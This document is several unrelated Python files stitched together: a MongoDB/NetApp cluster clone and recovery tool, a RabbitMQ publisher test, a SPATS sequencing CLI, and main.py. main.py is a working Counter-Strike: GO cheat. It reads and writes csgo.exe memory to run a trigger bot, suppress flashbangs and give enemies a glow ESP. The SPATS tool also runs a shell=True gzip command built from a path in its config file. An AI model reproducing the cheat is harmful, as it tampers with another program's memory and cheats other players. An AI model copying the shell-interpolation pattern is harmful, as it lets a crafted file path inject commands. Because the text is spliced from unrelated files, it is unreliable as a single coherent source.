# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(shard_member['hostname']))
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(shard_member['hostname']))
host.close()
# -- Starting mongoses
count = 1
configdb = self.clone_spec['config_servers']['setname'] + '/'
for spec_cs_member in self.clone_spec['config_servers']['members']:
if count < len(self.clone_spec['config_servers']['members']):
configdb += spec_cs_member['hostname'] + ':' + spec_cs_member['port'] + ','
elif count == len(self.clone_spec['config_servers']['members']):
configdb += spec_cs_member['hostname'] + ':' + spec_cs_member['port']
count += 1
for mongos in self.clone_spec['mongos']:
host = HostConn(ipaddr=mongos, username=self.username)
result = host.run_command('/usr/bin/mongos --bind_ip ' + mongos + ' --configdb ' + configdb +
' --fork --logpath /var/log/mongodb/mongos.log')
if result[1] != 0:
logging.error('Could not start mongos on host {}.'.format(mongos))
exit(1)
else:
logging.info('mongos has been started on host {}.'.format(mongos))
host.close()
# -- Stage 3 :: Cataloging it
clone_metadata = dict()
clone_metadata['clone_name'] = self.clone_name
clone_metadata['backup_name'] = self.backup_name
clone_metadata['cluster_name'] = self.cluster_name
clone_metadata['clone_uid'] = int(self.clone_uid)
clone_metadata['created_at'] = datetime.now()
clone_metadata['desc'] = self.desc
clone_metadata['mongos'] = self.clone_spec['mongos']
clone_metadata['config_server'] = list()
clone_metadata['shards'] = list()
for cs_member in cloned_cluster['config_servers']['members']:
member = dict()
if cs_member['arbiter_only']:
member['hostname'] = cs_member['hostname']
member['arbiter_only'] = cs_member['arbiter_only']
continue
member['hostname'] = cs_member['hostname']
member['arbiter_only'] = cs_member['arbiter_only']
member['igroup_name'] = cs_member['igroup'].initiator_group_name
member['svm_name'] = cs_member['svm-name']
member['mountpoint'] = cs_member['mountpoint']
member['lvm_vgname'] = cs_member['storage_info']['lvm_vgname']
member['volclone_topology'] = list()
for vol in cs_member['volclone_topology']:
member['volclone_topology'].append(vol.volume)
clone_metadata['config_server'].append(member)
for shard in cloned_cluster['shards']:
sh = dict()
sh['name'] = shard['name']
sh['members'] = list()
for sh_member in shard['members']:
member = dict()
if sh_member['arbiter_only']:
member['hostname'] = sh_member['hostname']
member['arbiter_only'] = sh_member['arbiter_only']
continue
member['hostname'] = sh_member['hostname']
member['arbiter_only'] = sh_member['arbiter_only']
member['igroup_name'] = sh_member['igroup'].initiator_group_name
member['svm_name'] = sh_member['svm-name']
member['mountpoint'] = sh_member['mountpoint']
member['lvm_vgname'] = sh_member['storage_info']['lvm_vgname']
member['volclone_topology'] = list()
for vol in sh_member['volclone_topology']:
member['volclone_topology'].append(vol.volume)
sh['members'].append(member)
clone_metadata['shards'].append(sh)
kdb_clones = kdb_session['clones']
result = kdb_clones.insert_one(clone_metadata).inserted_id
if result is None:
logging.error('Clone has been created but it was not inserted into the catalog.')
exit(1)
else:
logging.info('Clone has been created successfully.')
def delete(self, kdb_session=None):
kdb_clones = kdb_session['clones']
clone2del = kdb_clones.find_one({'clone_name': self.clone_name})
if clone2del is None:
logging.error('Cannot find clone {}.'.format(self.clone_name))
exit(1)
for mongos in clone2del['mongos']:
host = HostConn(ipaddr=mongos, username=self.username)
result = host.run_command('pkill mongos')
if result[1] != 0:
logging.error('Could not kill mongos on host {}.'.format(mongos))
# exit(1)
else:
logging.info('mongos has been stopped on host {}.'.format(mongos))
host.close()
for cs_member in clone2del['config_server']:
host = HostConn(ipaddr=cs_member['hostname'], username=self.username)
if cs_member['arbiter_only']:
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(cs_member['hostname']))
continue
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(cs_member['hostname']))
sleep(3)
result = host.umount_fs(fs_mountpoint=cs_member['mountpoint'])
if result[1] != 0:
logging.error('Could not unmount mongoDB file system {} on host {}.'.format(cs_member['mountpoint'],
cs_member['hostname']))
# exit(1)
else:
logging.info('mongoDB file system {} has been unmounted on host {}.'.format(cs_member['mountpoint'],
cs_member['hostname']))
sleep(3)
result = host.disable_vg(vg_name=cs_member['lvm_vgname'])
if result[1] != 0:
logging.error('Could not disable volume group {} on host {}.'.format(cs_member['lvm_vgname'],
cs_member['hostname']))
# exit(1)
else:
logging.info('Volume Group {} has been disabled on host {}.'.format(cs_member['lvm_vgname'],
cs_member['hostname']))
# -- establishing NetApp cluster session to delete flexclones
# -- Putting volumes offline, then delete them.
# -- Destroying igroups
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': cs_member['svm_name']})
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
for vol in cs_member['volclone_topology']:
vol_spec = dict()
vol_spec['volume'] = vol
volclone = Volume(vol_spec)
result = volclone.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not delete flexvolume {} on SVM {}.'.format(vol, cs_member['svm_name']))
# exit(1)
else:
logging.info('FlexClone volume {} has been deleted on SVM {}.'.format(vol, cs_member['svm_name']))
igroup_spec = dict()
igroup_spec['igroup-name'] = cs_member['igroup_name']
igroup = InitiatorGroup(igroup_spec)
result = igroup.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not destroy igroup {} on SVM {}.'.format(cs_member['igroup_name'],
cs_member['svm_name']))
# exit(1)
else:
logging.info('Igroup {} has been destroyed on SVM {}.'.format(cs_member['igroup_name'],
cs_member['svm_name']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan devices on host {}.'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('Stale devices has been removed on host {}.'.format(cs_member['hostname']))
host.close()
for shard in clone2del['shards']:
for sh_member in shard['members']:
host = HostConn(ipaddr=sh_member['hostname'], username=self.username)
if sh_member['arbiter_only']:
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(sh_member['hostname']))
continue
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(sh_member['hostname']))
sleep(3)
result = host.umount_fs(fs_mountpoint=sh_member['mountpoint'])
if result[1] != 0:
logging.error('Could not unmount mongoDB file system {} on host {}.'.format(sh_member['mountpoint'],
sh_member['hostname']))
# exit(1)
else:
logging.info('mongoDB file system {} has been unmounted on host {}.'.format(sh_member['mountpoint'],
sh_member['hostname']))
sleep(3)
result = host.disable_vg(vg_name=sh_member['lvm_vgname'])
if result[1] != 0:
logging.error('Could not disable volume group {} on host {}.'.format(sh_member['lvm_vgname'],
sh_member['hostname']))
# exit(1)
else:
logging.info('Volume Group {} has been disabled on host {}.'.format(sh_member['lvm_vgname'],
sh_member['hostname']))
# -- establishing NetApp cluster session to delete flexclones
# -- Putting volumes offline, then delete them.
# -- Destroying igroups
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': sh_member['svm_name']})
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
for vol in sh_member['volclone_topology']:
vol_spec = dict()
vol_spec['volume'] = vol
volclone = Volume(vol_spec)
result = volclone.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not delete flexvolume {} on SVM {}.'.format(vol, sh_member['svm_name']))
# exit(1)
else:
logging.info(
'FlexClone volume {} has been deleted on SVM {}.'.format(vol, sh_member['svm_name']))
igroup_spec = dict()
igroup_spec['igroup-name'] = sh_member['igroup_name']
igroup = InitiatorGroup(igroup_spec)
result = igroup.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not destroy igroup {} on SVM {}.'.format(sh_member['igroup_name'],
sh_member['svm_name']))
# exit(1)
else:
logging.info('Igroup {} has been destroyed on SVM {}.'.format(sh_member['igroup_name'],
sh_member['svm_name']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan devices on host {}.'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('Stale devices has been removed on host {}.'.format(sh_member['hostname']))
host.close()
result = kdb_clones.delete_one({'clone_name': self.clone_name})
if result is not None:
logging.info('Clone {} has been deleted.'.format(self.clone_name))
def list(self, kdb_session=None):
kdb_clones = kdb_session['clones']
result = kdb_clones.find({'cluster_name': self.cluster_name})
if result is None:
print 'There are no clones to be listed for {} cluster.'.format(self.cluster_name)
else:
for clone in result:
print 'Clone Name..: {}'.format(clone['clone_name'])
print 'Created at..: {}'.format(clone['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'))
print 'Based on....: {}'.format(clone['backup_name'])
print 'Description.: {}'.format(clone['desc'])
print ''
# print '{:30} \t {:30} \t {:30} \t {:40}'.format('Clone Name', 'Created at', 'Based on', 'Description')
# for clone in result:
# print '{:30} \t {:30} \t {:30} \t {:40}'.format(clone['clone_name'], clone['created_at'].strftime('%c %Z'),
# clone['backup_name'], clone['desc'])
class SubCmdRecover:
    """Recover archived operations from an archive repository back into a
    destination cluster using one producer and N consumer processes.
    """
    def __init__(self, rec_spec=None):
        self.cluster_name = rec_spec['from-cluster-name']
        self.dest_mongodb_uri = rec_spec['dest-mongodb-uri']
        self.from_date = rec_spec['from-date']
        self.until_date = rec_spec['until-date']
        self.arch_repo_name = rec_spec['arch-repo-name']
        self.arch_repo_uri = rec_spec['arch-repo-uri']
        # unique working collection name for this recovery session
        self.temp_coll = 'temp_' + self.cluster_name + '_' + str(int(time()))
        if 'skip_op_cfg' in rec_spec:
            self.skip_op = rec_spec['skip_op_cfg']
        # BUGFIX: use floor division and clamp to >= 1. The original compared
        # (cpu_count()/2)-1 == 0, which on a single-core host produced -1
        # consumers, so no consumer process was ever started.
        workers = (mp.cpu_count() // 2) - 1
        self.num_consumers = workers if workers > 0 else 1
    def start(self):
        """Run the recovery: producer feeds a JoinableQueue, consumers drain it."""
        # multiprocessing.JoinableQueue() is the portable constructor;
        # multiprocessing.queues.JoinableQueue requires a ctx on Python 3.
        recover_queue = multiprocessing.JoinableQueue()
        # Recover Producer instance
        atd = ArchTempData(arch_repo_uri=self.arch_repo_uri, arch_repo_name=self.arch_repo_name,
                           source_cluster_name=self.cluster_name, begin_from=self.from_date, upto=self.until_date,
                           temp_coll=self.temp_coll, arch_queue=recover_queue)
        # Create a temporary collection containing the data that will be added back to the databases
        atd.create_temp_data()
        # Create a process to read temp data and insert in the queue
        atd.read_temp_data()
        # one consumer instance (and process) per worker slot
        consumers = [RecoverConsumer(arch_queue=recover_queue, dest_cluster_uri=self.dest_mongodb_uri)
                     for _ in range(self.num_consumers)]
        consumer_procs = [mp.Process(target=consumer.run) for consumer in consumers]
        # kicking off consumer processes
        for consumer_proc in consumer_procs:
            consumer_proc.start()
        # Waiting processes to finish their work
        for consumer_proc in consumer_procs:
            consumer_proc.join()
        # Destroy temp data collection
        atd.destroy_temp_data()
        logging.info('Recover process has been completed.')
class SubCmdArchiver:
    """CLI subcommand handlers to register, control and inspect archiver daemons."""
    def __init__(self, archiver_spec=None):
        self.arch_spec = archiver_spec
    def create(self, catalog_sess=None):
        """Register this archiver in the catalog."""
        catalog_sess.add(coll_name='archivers', doc=self.arch_spec)
    def delete(self, catalog_sess=None):
        """Remove this archiver's catalog entry."""
        catalog_sess.remove_one(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
                                                             'archiver_name': self.arch_spec['archiver_name']})
    @staticmethod
    def list(catalog_sess=None, cluster_name=None):
        """Return all archivers registered for *cluster_name*."""
        archivers = catalog_sess.find_all(coll_name='archivers', query={'cluster_name': cluster_name})
        return archivers
    def stop(self, catalog_sess=None):
        """Terminate the running archiver (PID read from its pidfile) and drop the pidfile reference."""
        pidfilename = catalog_sess.find_one(coll_name='archivers',
                                            query={'cluster_name': self.arch_spec['cluster_name'],
                                                   'archiver_name': self.arch_spec['archiver_name']})['pidfile']
        try:
            with open(pidfilename, 'r') as pidfile:
                ppid = pidfile.readline()
        except IOError as e:
            # BUGFIX: bail out here -- the original fell through and raised a
            # NameError on the undefined 'ppid' below.
            logging.error(e)
            return
        Process(int(ppid)).terminate()
        catalog_sess.edit(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
                                                        'archiver_name': self.arch_spec['archiver_name']},
                          update={'$unset': {'pidfile': ''}})
    def start(self, catalog_sess=None):
        """Launch the archiver app and record its pidfile in the catalog."""
        appKAPTR = AppKairosAPTR(cluster_name=self.arch_spec['cluster_name'],
                                 database_name=self.arch_spec['database_name'],
                                 collections=self.arch_spec['collections'], mongodb_uri=self.arch_spec['mongodb_uri'],
                                 archiver_name=self.arch_spec['archiver_name'],
                                 archive_repo_uri=self.arch_spec['archive_repo_uri'],
                                 archive_repo_name=self.arch_spec['archive_repo_name'])
        catalog_sess.edit(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
                                                        'archiver_name': self.arch_spec['archiver_name']},
                          update={'$set': { 'pidfile': appKAPTR.get_pidfilename()}})
        appKAPTR.start()
    def status(self, catalog_sess=None):
        """Return True when the registered archiver process is alive, else False."""
        # Getting the PID filename from Kairos' repository
        archiver = catalog_sess.find_one(coll_name='archivers',
                                         query={'cluster_name': self.arch_spec['cluster_name'],
                                                'archiver_name': self.arch_spec['archiver_name']})
        # No pidfile recorded means the archiver was never started (or was stopped).
        if 'pidfile' not in archiver.keys():
            return False
        try:
            with open(archiver['pidfile'], 'r') as pidfile:
                ppid = pidfile.readline()
        except IOError as e:
            logging.error(e)
            return False
        # Instanciating a process to get info about it.
        # NOTE(review): name() == 'python' may miss 'python3' binaries -- confirm.
        proc = Process(int(ppid))
        return proc.name() == 'python' and self.arch_spec['archiver_name'] in proc.cmdline()
class SubCmdOperations:
    """Aggregation helpers over a cluster's archived-operations collection."""
    def __init__(self, catalog_sess=None):
        self.catalog = catalog_sess
    def get_first_and_last_ops_per_coll(self, cluster_name=None):
        """First and last operation timestamps grouped per database/collection."""
        pipeline = [
            {'$sort': {'created_at': 1}},
            {'$group': {'_id': {'dbname':'$ns.db', 'collname':'$ns.coll'},
                        'firstOperation': {'$first': '$created_at'},
                        'lastOperation': {'$last': '$created_at'}
                        }
             },
            {'$sort': {'firstOperation': 1}}
        ]
        aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
        return aggr_ops
    def get_first_and_last_ops_cluster(self, cluster_name=None):
        """First and last operation timestamps for the whole cluster."""
        pipeline = [
            {'$sort': {'created_at': 1}},
            {'$group': {'_id': 'cluster',
                        'firstOperation': {'$first': '$created_at'},
                        'lastOperation': {'$last': '$created_at'}
                        }
             },
            {'$sort': {'firstOperation': 1}}
        ]
        aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
        return aggr_ops
    def get_ops_per_type(self, cluster_name=None, from_date=None, until_date=None):
        """Operation counts per type, grouped per database/collection, in a date range."""
        pipeline = [
            {
                '$match': {
                    '$and': [
                        {'created_at': {'$gte': from_date}},
                        {'created_at': {'$lte': until_date}}
                    ]
                }
            },
            {
                '$group': {
                    '_id': {'dbname': '$ns.db', 'collname': '$ns.coll', 'op_type': '$operationType'},
                    'totalOps': {'$sum': 1}
                }
            },
            {
                '$project': {
                    '_id': 0,
                    'dbname': '$_id.dbname',
                    'collname': '$_id.collname',
                    'op_type': '$_id.op_type',
                    'totalOps': 1
                }
            },
            {
                '$group': {
                    '_id': {'dbname': '$dbname', 'collname': '$collname'},
                    'per_type': {
                        '$push': {'op_type': '$op_type', 'totalOps': '$totalOps'}
                    }
                }
            },
            {'$sort': {'_id': 1, 'per_type.op_type': 1}}
        ]
        aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
        return aggr_ops
    def get_total_ops_per_collection(self, cluster_name=None, from_date=None, until_date=None):
        """Total operation count per database/collection in a date range.

        BUGFIX: the original $match used 'created_at' twice in one Python dict,
        so the $gte bound was silently overwritten by $lte; both bounds now
        live in a single range document.
        """
        pipeline = [
            {
                '$match': {
                    'created_at': {'$gte': from_date, '$lte': until_date}
                }
            },
            {
                '$group': {
                    '_id': {'dbname': '$ns.db', 'collname': '$ns.coll', 'op_type': '$operationType'},
                    'totalOps': {'$sum': 1}
                }
            },
            {
                '$group': {
                    '_id': {'dbname':'$_id.dbname', 'collname': '$_id.collname'},
                    'totalCollOps': { '$sum': '$totalOps'}
                }
            }
        ]
        aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
        return aggr_ops
|
pika_publisher_test.py | import time
import threading
import sys
sys.path.append("../")
from IoTPy.core.stream import Stream, run
from IoTPy.concurrency.PikaPublisher import PikaPublisher
# multicore imports
from IoTPy.concurrency.multicore import get_processes_and_procs
from IoTPy.concurrency.multicore import terminate_stream
from IoTPy.concurrency.multicore import extend_stream
def test_pika_publisher(routing_key, exchange, host, data):
    """Publish each sublist of *data* to RabbitMQ through a single IoTPy
    multicore process whose agent wraps PikaPublisher.

    The 'source' stream is fed from a thread running inside the publisher
    process; a trailing '_finished' marker tells subscribers the stream ended.
    """
    # Step 0: Define agent functions, source threads
    # and actuator threads (if any).
    # Step 0.0: Define agent functions.
    # pika_publisher_agent is the agent for the processor
    # called 'pika_publisher_process'.
    def pika_publisher_agent(in_streams, out_streams):
        # publish in_streams[0] for the specified routing key, exchange, host.
        PikaPublisher(
            routing_key, exchange, host).publish(in_streams[0])
    # Step 0.1: Define source thread targets (if any).
    def thread_target_source(procs):
        for sublist in data:
            extend_stream(procs, sublist, stream_name='source')
            # Sleep to simulate an external data source.
            time.sleep(0.001)
        # Put '_finished' on the stream because the stream will not
        # be extended. This informs subscriber that stream is finished.
        extend_stream(procs, data=['_finished'], stream_name='source')
        # Terminate stream because this stream will not be extended.
        terminate_stream(procs, stream_name='source')
    # Step 1: multicore_specification of streams and processes.
    # Specify Streams: list of pairs (stream_name, stream_type).
    # Specify Processes: name, agent function,
    # lists of inputs and outputs, additional arguments.
    multicore_specification = [
        # Streams
        [('source', 'x')],
        # Processes
        [{'name': 'pika_publisher_process', 'agent': pika_publisher_agent,
          'inputs':['source'], 'sources': ['source']}]]
    # Step 2: Create processes.
    processes, procs = get_processes_and_procs(multicore_specification)
    # Step 3: Create threads (if any)
    thread_0 = threading.Thread(target=thread_target_source, args=(procs,))
    # Step 4: Specify which process each thread runs in.
    # thread_0 runs in the process called 'pika_publisher_process'.
    procs['pika_publisher_process'].threads = [thread_0]
    # Step 5: Start, join and terminate processes.
    for process in processes: process.start()
    for process in processes: process.join()
    for process in processes: process.terminate()
def simple_test():
    """
    A simpler test than test_pika_publisher. This simpler
    test uses 'run' rather than creating a process and thread.
    """
    publication_stream = Stream('stream')
    publisher = PikaPublisher(routing_key='temperature',
                              exchange='publications',
                              host='localhost')
    publisher.publish(publication_stream)
    # One payload followed by the end-of-stream marker.
    publication_stream.extend(['Please Vote!'])
    publication_stream.append('_finished')
#--------------------------------------------
# TESTS
#--------------------------------------------
if __name__ == '__main__':
    # Run either the main test or simple_test (but not both).
    # This is some arbitrary data merely for testing; each sublist
    # of data is published separately.
    data = [[0, 1], ['Hello', 'World'], ['THE', 'END', 'IS', 'NIGH!', '_finished']]
    test_pika_publisher(routing_key='temperature',
                        exchange='publications',
                        host='localhost',
                        data=data)
    # simple_test()
|
main.py | from pystyle import Anime, Center, Colorate, Colors
from pynput.mouse import Button, Controller
import threading, time, pymem, random
class Offset:
    """Hard-coded csgo.exe/client.dll memory offsets (build-specific values)."""
    def __init__(self):
        # module-relative addresses in client.dll
        self.dwEntityList = 0x4DBF75C
        self.dwLocalPlayer = 0xDA544C
        self.dwGlowObjectManager = 0x5307C48
        # per-entity field offsets
        self.m_iCrosshairId = 0x11838
        self.m_iTeamNum = 0xF4
        self.m_fFlags = 0x104
        self.m_flFlashMaxAlpha = 0x1046C
        self.m_iGlowIndex = 0x10488
        self.m_dwBoneMatrix = 0x26A8
        self.m_vecOrigin = 0x138
class CsFuck:
    """Background workers (trigger bot, flash suppression, glow ESP) driven by
    reads/writes on the csgo.exe process memory via pymem."""
    def __init__(self):
        # feature toggles read by the worker loops
        self.trigger_bot = True
        self.no_flash = True
        self.esp = True
        self.mouse = Controller()
        self.Offset = Offset()
        self.pm = pymem.Pymem("csgo.exe")
        self.client = pymem.process.module_from_name(self.pm.process_handle, "client.dll").lpBaseOfDll
    def triger_bot_tread(self):
        """Click when the crosshair rests on an entity of the opposing team."""
        while True:
            # BUGFIX: the original tested `if self.triger_bot_tread:` -- the bound
            # method object itself, which is always truthy -- so the trigger_bot
            # toggle was dead. Test the flag instead.
            if self.trigger_bot:
                time.sleep(0.006)
                try:
                    player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
                    entity_id = self.pm.read_int(player + self.Offset.m_iCrosshairId)
                    entity = self.pm.read_int(self.client + self.Offset.dwEntityList + (entity_id - 1) * 0x10)
                    entity_team = self.pm.read_int(entity + self.Offset.m_iTeamNum)
                    player_team = self.pm.read_int(player + self.Offset.m_iTeamNum)
                    if entity_id > 0 and entity_id <= 64 and player_team != entity_team:
                        self.mouse.click(Button.left, 1)
                except:
                    # memory reads race the game's own updates; ignore failures
                    pass
            else:
                time.sleep(1)
    def no_flash_thread(self):
        """Continuously zero the local player's max flash alpha."""
        while True:
            if self.no_flash:
                player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
                if player:
                    flash_value = player + self.Offset.m_flFlashMaxAlpha
                    if flash_value:
                        self.pm.write_float(flash_value, float(0))
            time.sleep(1)
    def esp_thread(self):
        """Write glow colors for all entities: random-ish for enemies, green for teammates."""
        while True:
            if self.esp:
                time.sleep(0.006)
                glow_manager = self.pm.read_int(self.client + self.Offset.dwGlowObjectManager)
                player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
                player_team = self.pm.read_int(player + self.Offset.m_iTeamNum)
                for i in range(1, 64):
                    try:
                        entity = self.pm.read_int(self.client + self.Offset.dwEntityList + i * 0x10)
                        if entity:
                            entity_glow = self.pm.read_int(entity + self.Offset.m_iGlowIndex)
                            entity_team = self.pm.read_int(entity + self.Offset.m_iTeamNum)
                            if player_team != entity_team:
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x8, float(random.randint(0, 1)))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0xC, float(random.randint(0, 1)))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x10, float(random.randint(0, 1)))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x14, float(1))
                                self.pm.write_int(glow_manager + entity_glow * 0x38 + 0x28, 1)
                            else:
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x8, float(0))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0xC, float(1))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x10, float(0))
                                self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x14, float(1))
                                self.pm.write_int(glow_manager + entity_glow * 0x38 + 0x28, 1)
                    except:
                        # stale/invalid entity slots are expected; skip them
                        pass
            else:
                time.sleep(1)
    def run(self):
        """Start one daemon-style worker thread per feature."""
        threading.Thread(target= self.no_flash_thread).start()
        threading.Thread(target= self.triger_bot_tread).start()
        threading.Thread(target= self.esp_thread).start()
banner = '''
 ____ _____ _
 / ___|___ _ _| ___| _ ___| | __
| | / __(_|_) |_ | | | |/ __| |/ /
| |___\__ \_ _| _|| |_| | (__| <
 \____|___(_|_)_| \__,_|\___|_|\_\\
'''
# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    Anime.Fade(Center.Center(banner), Colors.blue_to_purple, Colorate.Vertical, interval=1)
    CsFuck().run()
tool.py |
import ast
from configparser import ConfigParser, SafeConfigParser
import csv
import datetime
import json
import multiprocessing
import os
import shutil
import subprocess
import sys
import time
from shutil import copyfile
import re
import ntpath
import spats_shape_seq
from spats_shape_seq import Spats
from spats_shape_seq.parse import abif_parse, fastq_handle_filter, FastFastqParser
from spats_shape_seq.reads import ReadsData, ReadsAnalyzer
from spats_shape_seq.counters import Counters
from spats_shape_seq.util import objdict_to_dict
from spats_shape_seq.mask import PLUS_PLACEHOLDER, MINUS_PLACEHOLDER
class SpatsTool(object):
def __init__(self, path):
self.path = path or os.getcwd()
self.config = None
self.cotrans = False
self._skip_log = False
self._no_config_required_commands = [ "doc", "help", "init", "viz", "show", "extract_case", "add_case", "show_test_case" ]
self._private_commands = [ "viz", "to_shapeware", "rerun" ]
self._temp_files = []
self._r1 = None
self._r2 = None
self._r1_plus = None
self._r2_plus = None
self._r1_minus = None
self._r2_minus = None
self._parse_config()
def _parse_config(self):
config_path = os.path.join(self.path, "spats.config")
if not os.path.exists(config_path):
return
parser = SafeConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
if section not in config:
config[section] = {}
for name, value in parser.items(section):
config[section][name] = value
if config and 'spats' in config:
self.config = config['spats']
if 'cotrans' in self.config:
cotrans = self.config['cotrans']
self.cotrans = bool(ast.literal_eval(cotrans))
self.metadata = config.get('metadata', {})
def _module_path(self):
return os.path.dirname(spats_shape_seq.__file__)
def _spats_path(self):
return os.path.normpath(os.path.join(self._module_path(), ".."))
def _native_tool(self, tool_name):
bin_path = os.path.join(self._spats_path(), "native", "bin", tool_name)
return bin_path if os.path.exists(bin_path) else None
def _add_note(self, note):
self._notes.append(note)
print(":{}".format(note))
    def _load_r1_r2(self, suffix = ''):
        """Resolve the configured 'r1<suffix>'/'r2<suffix>' input files.

        Gzipped inputs are decompressed into <base>.tmp files in self.path and
        registered in self._temp_files for cleanup by _run(). Each config value
        is a comma-separated list; a single entry is returned as a bare path,
        multiple entries as a list (see singleOrList).
        """
        def decomp(rx):
            # Decompress *.gz in place (via shell gzip) and return the temp path;
            # any other extension is returned untouched.
            base, ext = os.path.splitext(os.path.basename(rx))
            if ext.lower() == '.gz':
                self._add_note("decompressing {}".format(rx))
                out = os.path.join(self.path, base + ".tmp")
                subprocess.check_call('gzip -d -c "{}" > "{}"'.format(rx, out), cwd = self.path, shell = True)
                # registered so _run() removes it after the command finishes
                self._temp_files.append(out)
                self._sentinel("decompress {}".format(rx))
                return out
            return rx
        def singleOrList(rkey):
            # hack to keep r1_plus and r2_plus properties backwards compatible...
            res = [ decomp(r.strip()) for r in self.config[rkey].split(',') ]
            return res if len(res) > 1 else res[0]
        return singleOrList('r1' + suffix), singleOrList('r2' + suffix)
@property
def r1(self):
if not self._r1:
self._r1, self._r2 = self._load_r1_r2()
return self._r1
@property
def r2(self):
if not self._r2:
self._r1, self._r2 = self._load_r1_r2()
return self._r2
@property
def using_separate_channel_files(self):
return bool(self.config.get('r1_plus'))
@property
def r1_plus(self):
if not self._r1_plus:
self._r1_plus, self._r2_plus = self._load_r1_r2('_plus')
return self._r1_plus
@property
def r2_plus(self):
if not self._r2_plus:
self._r1_plus, self._r2_plus = self._load_r1_r2('_plus')
return self._r2_plus
@property
def plus_channels(self):
r1p, r2p = self.r1_plus, self.r2_plus
if not isinstance(r1p, list):
r1p = [ r1p ]
if not isinstance(r2p, list):
r2p = [ r2p ]
if len(r1p) != len(r2p):
raise Exception("r1/r2 plus channels do not correspond")
return zip(r1p, r2p)
@property
def r1_minus(self):
if not self._r1_minus:
self._r1_minus, self._r2_minus = self._load_r1_r2('_minus')
return self._r1_minus
@property
def r2_minus(self):
if not self._r2_minus:
self._r1_minus, self._r2_minus = self._load_r1_r2('_minus')
return self._r2_minus
    def _run(self, args):
        """Dispatch a CLI invocation: args[0] is the command (a method on self),
        the rest become self._command_args.

        Commands outside _no_config_required_commands need spats.config loaded.
        On success (and unless the handler set _skip_log) the elapsed time and
        collected notes are appended to spats.log; temp files registered by
        _load_r1_r2 are removed either way.
        """
        if not args:
            print("Command required. Try 'spats_tool help'.")
            return
        command = args[0]
        self._command_args = args[1:]
        if not self.config and command not in self._no_config_required_commands:
            print("Missing spats.config")
            return
        self._notes = []
        self.start = time.time()
        # command name maps directly to a method on this object
        hdlr = getattr(self, command, None)
        if not hdlr:
            print("Invalid command: {}".format(command))
            return
        try:
            hdlr()
            failure = False
        except Exception as e:
            # report but don't propagate; keeps the CLI exit clean
            print("** Command {} failed. ({})".format(command, e))
            failure = True
            #raise
        if not failure and not self._skip_log:
            delta = self._sentinel("{} complete".format(command))
            self._log(command, delta)
        # clean up decompressed .tmp inputs regardless of success
        for f in self._temp_files:
            if os.path.exists(f):
                os.remove(f)
def _sentinel(self, label):
delta = time.time() - self.start
self._add_note("{} @ {:.2f}s".format(label, delta))
return delta
def _log(self, command, delta):
stamp = datetime.datetime.now().strftime('%Y/%m/%d %H:%M')
with open(os.path.join(self.path, 'spats.log'), 'at') as outfile:
outfile.write("{} : {}, {:.2f}s\n".format(stamp, command, delta))
for note in self._notes:
outfile.write(" - {}\n".format(note))
outfile.write("\n")
def init(self):
"""Set up a spats_tool folder.
"""
self._skip_log = True
config_path = os.path.join(self.path, "spats.config")
if not os.path.exists(config_path):
